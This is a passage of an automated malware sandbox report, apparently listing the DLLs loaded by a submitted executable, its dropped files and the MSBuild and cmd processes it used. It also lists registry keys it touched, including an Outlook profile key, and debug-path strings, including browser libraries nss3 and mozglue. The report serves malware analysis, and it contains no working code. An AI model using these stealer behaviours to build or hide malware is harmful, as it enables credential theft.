                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: idndl.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: bitsproxy.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: msimg32.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: oledlg.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: oleacc.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: netapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: samcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: dbghelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: pla.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: pdh.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: tdh.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: cabinet.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: wevtapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: shdocvw.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: winhttp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeSection loaded: apphelp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: Binary string: mozglue.pdbP source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: nss3.pdb@ source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942647828.00000173F45F0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: mozglue.pdb source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
